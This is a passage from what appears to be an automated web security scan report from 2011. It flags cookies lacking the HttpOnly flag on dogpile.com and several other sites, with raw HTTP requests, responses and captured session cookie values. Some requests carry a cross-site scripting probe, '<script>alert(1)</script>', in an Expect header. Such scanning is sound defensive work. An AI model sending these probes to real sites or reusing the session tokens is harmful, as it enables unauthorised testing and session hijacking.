The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=aceda43fda544d5f8fabc16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:34 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:34 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:34 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.82. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Videos%20Full/qlnk=1/rfcp=RightNav/rfcid=302360/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Videos%20Full/qlnk=1/rfcp=RightNav/rfcid=302360/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=53c34b6941924341b760c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:36 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:36 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:36 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.dogpile.com/dogpile_rss/ws/results/Web/Go%20Daddy%20Videos%20Full/1/302360/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7?_IceUrl=true
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=53c34b6941924341b760c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:36 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:36 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:36 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:59:36 GMT
Connection: close
Content-Length: 272

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.dogpile.com/dogpile_rss/ws/results/Web/Go%20Daddy%20Videos%20Full/1/302360/RightNav/Relevance/iq=true/zoom
...[SNIP]...

7.83. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy/qlnk=1/rfcp=RightNav/rfcid=302358/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy/qlnk=1/rfcp=RightNav/rfcid=302358/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=7ff1b4e7dcb14d578494c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:27 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:27 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:27 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 302 Redirect
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Location: http://www.dogpile.com/dogpile_other/ws/index
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=7ff1b4e7dcb14d578494c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:27 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:27 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:27 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:59:27 GMT
Connection: close
Content-Length: 168

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://www.dogpile.com/dogpile_other/ws/index">here</a></body>

7.84. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=MLB%20Schedule/adv=/rfcp=RightNav/rfcid=107/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=MLB%20Schedule/adv=/rfcp=RightNav/rfcid=107/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=8426efacdea344309ef3c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:43 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:43 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:43 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.85. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%202010%20Schedule/qlnk=1/rfcp=RightNav/rfcid=302363/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%202010%20Schedule/qlnk=1/rfcp=RightNav/rfcid=302363/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=fc2a1da3f8b6425386d4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:03 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:03 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:03 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.86. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Baseball%20Schedules/qlnk=1/rfcp=RightNav/rfcid=302362/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Baseball%20Schedules/qlnk=1/rfcp=RightNav/rfcid=302362/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=3fbd95b8ce29448a857dc16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:03 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:03 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:03 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.87. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Network%201!2F1!2F09%20Schedule/qlnk=1/rfcp=RightNav/rfcid=302360/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Network%201!2F1!2F09%20Schedule/qlnk=1/rfcp=RightNav/rfcid=302360/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=b0b870a4bed548babaf1c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:11 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:11 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:11 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.88. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Network%20Schedule/qlnk=1/rfcp=RightNav/rfcid=302364/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Network%20Schedule/qlnk=1/rfcp=RightNav/rfcid=302364/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=e68ff97dd2e54acf880ac16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:25 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:25 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:25 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.89. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Rumors/qlnk=1/rfcp=RightNav/rfcid=302358/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Rumors/qlnk=1/rfcp=RightNav/rfcid=302358/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=f1ca76c757384245b14ec16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:50 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:50 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:50 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.90. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Scores/qlnk=1/rfcp=RightNav/rfcid=302359/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Scores/qlnk=1/rfcp=RightNav/rfcid=302359/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=74fe018864fa485593ecc16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:57 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:57 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:57 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.91. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Standings/qlnk=1/rfcp=RightNav/rfcid=302361/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Standings/qlnk=1/rfcp=RightNav/rfcid=302361/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=9977e3ed3c924de3b38fc16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:13 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:13 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:13 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.92. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Trade%20Rumors/qlnk=1/rfcp=RightNav/rfcid=302357/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Trade%20Rumors/qlnk=1/rfcp=RightNav/rfcid=302357/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=cb5812815a1b48de81bfc16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:07 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:07 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:07 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.93. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=web/qkw=Go%20Daddy%20CEO%20Elephant/newtxn=false/rfcid=393/rfcp=TopNavigation/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/redir/qcat=web/qkw=Go%20Daddy%20CEO%20Elephant/newtxn=false/rfcid=393/rfcp=TopNavigation/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:45 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:45 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:45 GMT; path=/
wsPersist=ie8upgrade+0; expires=Thu, 08-Nov-2018 17:59:45 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_rss/ws/redir/qcat=web/qkw=Go%20Daddy%20CEO%20Elephant/newtxn=false/rfcid=393/rfcp=TopNavigation/_iceUrlFlag=11?_IceUrl=true&wsIE8Upgrade=0 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.dogpile.com/dogpile_rss/ws/results/Web/Go%20Daddy%20CEO%20Elephant/1/393/TopNavigation/Relevance/zoom=off/_iceUrlFlag=7?_IceUrl=true
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:45 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:45 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:45 GMT; path=/
Set-Cookie: wsPersist=ie8upgrade+0; expires=Thu, 08-Nov-2018 17:59:45 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:59:45 GMT
Connection: close
Content-Length: 260

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.dogpile.com/dogpile_rss/ws/results/Web/Go%20Daddy%20CEO%20Elephant/1/393/TopNavigation/Relevance/zoom=off/
...[SNIP]...

7.94. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=web/qkw=MLB%20Schedule/newtxn=false/rfcid=393/rfcp=TopNavigation/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/redir/qcat=web/qkw=MLB%20Schedule/newtxn=false/rfcid=393/rfcp=TopNavigation/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:48 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:48 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:48 GMT; path=/
wsPersist=ie8upgrade+0; expires=Thu, 08-Nov-2018 17:58:48 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_rss/ws/redir/qcat=web/qkw=MLB%20Schedule/newtxn=false/rfcid=393/rfcp=TopNavigation/_iceUrlFlag=11?_IceUrl=true&wsIE8Upgrade=0 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.dogpile.com/dogpile_rss/ws/results/Web/MLB%20Schedule/1/393/TopNavigation/Relevance/zoom=off/_iceUrlFlag=7?_IceUrl=true
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:48 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:48 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:48 GMT; path=/
Set-Cookie: wsPersist=ie8upgrade+0; expires=Thu, 08-Nov-2018 17:58:48 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:48 GMT
Connection: close
Content-Length: 247

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.dogpile.com/dogpile_rss/ws/results/Web/MLB%20Schedule/1/393/TopNavigation/Relevance/zoom=off/_iceUrlFlag=7
...[SNIP]...

7.95. http://www.dogpile.com/dogpile_rss/ws/termsofuse/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/termsofuse/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=7d43bcdc3ae442d4896bc16a3af0cb01&ActionId=5b1f3cc201c2452cb535c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:47 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:47 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:47 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_rss/ws/termsofuse/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.96. http://www.gospel.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.gospel.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=pnmocrecgbrqij27l9ujhr1bi1; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gospel.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.54
Date: Fri, 01 Apr 2011 16:38:29 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=pnmocrecgbrqij27l9ujhr1bi1; path=/
Content-Length: 8247

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...

7.97. http://www.hughesnetpower.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.hughesnetpower.com
Path:	/favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CFID=64204693;expires=Sun, 24-Mar-2041 16:24:41 GMT;path=/
CFTOKEN=51688309;expires=Sun, 24-Mar-2041 16:24:41 GMT;path=/
MID=05141HughesNetPower;domain=hughesnet.com;expires=Sun, 24-Mar-2041 16:24:41 GMT;path=/
MID=05141HughesNetPower;domain=hughesnet.com;expires=Sun, 24-Mar-2041 16:24:41 GMT;path=/

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hughesnetpower.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Moved permanently
Connection: close
Date: Fri, 01 Apr 2011 16:24:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=64204693;expires=Sun, 24-Mar-2041 16:24:41 GMT;path=/
Set-Cookie: CFTOKEN=51688309;expires=Sun, 24-Mar-2041 16:24:41 GMT;path=/
Set-Cookie: MID=;path=/
Set-Cookie: MID=;expires=Sun, 24-Mar-2041 16:24:41 GMT;path=/
Set-Cookie: MID=05141HughesNetPower;domain=hughesnet.com;expires=Sun, 24-Mar-2041 16:24:41 GMT;path=/
Set-Cookie: MID=05141HughesNetPower;domain=hughesnet.com;expires=Sun, 24-Mar-2041 16:24:41 GMT;path=/
Location: 404.htm
Content-Type: text/html; charset=UTF-8

7.98. http://www.mappoint.net/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.mappoint.net
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDAARACQBT=HJHCBAECJKIOKGAMEDEMJFAF; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mappoint.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 23
Content-Type: text/html
Location: http://www.microsoft.com/mappoint/net/
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDAARACQBT=HJHCBAECJKIOKGAMEDEMJFAF; path=/
P3P: CP='ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI'
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Fri, 01 Apr 2011 16:52:22 GMT
Connection: close

7.99. http://www.mercantila-checkout.com/setcookie.js previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.mercantila-checkout.com
Path:	/setcookie.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=egh03kvj37li18b09a11ogg340; path=/
merc_uid=6451364907577995808; expires=Sat, 19-Apr-2036 17:01:41 GMT; path=/; domain=.mercantila-checkout.com

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.100. http://www.mercantila.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
